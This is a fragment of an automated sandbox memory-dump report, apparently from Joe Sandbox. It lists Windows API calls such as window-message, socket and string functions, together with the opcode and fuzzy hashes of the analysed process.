• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Proc$Parent
• String ID:
• API String ID: 2351499541-0
• Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
• Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
• Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
• Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
• TranslateMessage.USER32(?), ref: 00442B01
• DispatchMessageW.USER32(?), ref: 00442B0B
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Message$Peek$DispatchTranslate
• String ID:
• API String ID: 1795658109-0
• Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
• Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
• Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
• Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
APIs
• GetForegroundWindow.USER32(?,?,?), ref: 0047439C
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• GetCaretPos.USER32(?), ref: 004743B2
• ClientToScreen.USER32(00000000,?), ref: 004743E8
• GetForegroundWindow.USER32 ref: 004743EE
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
• Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
• Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
• Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
APIs
  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
• SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
• _wcslen.LIBCMT ref: 00449519
• _wcslen.LIBCMT ref: 00449526
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: MessageSend_wcslen$_wcspbrk
• String ID:
• API String ID: 2886238975-0
• Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
• Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
• Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
• Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
APIs
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: __setmode$DebugOutputString_fprintf
• String ID:
• API String ID: 1792727568-0
• Opcode ID: 676bf48cbc0913da9d448bfa9dbb5afa6081ad4ac6e550982d94ce8568994cfe
• Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
• Opcode Fuzzy Hash: 676bf48cbc0913da9d448bfa9dbb5afa6081ad4ac6e550982d94ce8568994cfe
• Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
APIs
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
• Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
• Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
• Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
• Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                                                                      • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                                                                      • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                                                                    • String ID: cdecl
                                                                                                                                                    • API String ID: 3850814276-3896280584
                                                                                                                                                    • Opcode ID: ef10fd9676808073a4c8f1725e80f68a3f5fbe52312c97b5579e19edf3a4be4a
                                                                                                                                                    • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                                                                    • Opcode Fuzzy Hash: ef10fd9676808073a4c8f1725e80f68a3f5fbe52312c97b5579e19edf3a4be4a
                                                                                                                                                    • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                                                    • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                                                                                    • _memmove.LIBCMT ref: 0046D475
                                                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2502553879-0
                                                                                                                                                    • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                                                    • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                                                                                    • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                                                                    • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32 ref: 00448C69
                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                                                                    • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 312131281-0
                                                                                                                                                    • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                                                    • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                                                                    • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                                                    • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                                                                    APIs
                                                                                                                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastacceptselect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 385091864-0
                                                                                                                                                    • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                                    • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                                                                    • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                                    • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                                                    • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                                                                    • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                                                    • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                                                                    APIs
                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Window$CreateMessageObjectSendShowStock
• String ID:
• API String ID: 1358664141-0
• Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
• Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
• Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
• Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8

APIs
• GetCurrentThreadId.KERNEL32 ref: 00443CA6
• MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
• CloseHandle.KERNEL32(00000000), ref: 00443CF9
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
• Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
• Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
• Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9

APIs
• GetWindowRect.USER32(?,?), ref: 00430BA2
• ScreenToClient.USER32(?,?), ref: 00430BC1
• ScreenToClient.USER32(?,?), ref: 00430BE2
• InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
• Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
• Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
• Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0

APIs
• __wsplitpath.LIBCMT ref: 0043392E
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• __wsplitpath.LIBCMT ref: 00433950
• __wcsicoll.LIBCMT ref: 00433974
• __wcsicoll.LIBCMT ref: 0043398A
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
• String ID:
• API String ID: 1187119602-0
• Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
• Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
• Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
• Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4

APIs
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _wcslen$_malloc_wcscat_wcscpy
• String ID:
• API String ID: 1597257046-0
• Opcode ID: 4c4580c226b57f615dac04873813745d63ecd7a44388bc767de67aba20fe6967
• Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
• Opcode Fuzzy Hash: 4c4580c226b57f615dac04873813745d63ecd7a44388bc767de67aba20fe6967
• Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764

APIs
• GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
• __malloc_crt.LIBCMT ref: 0041F5B6
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
Memory Dump Source
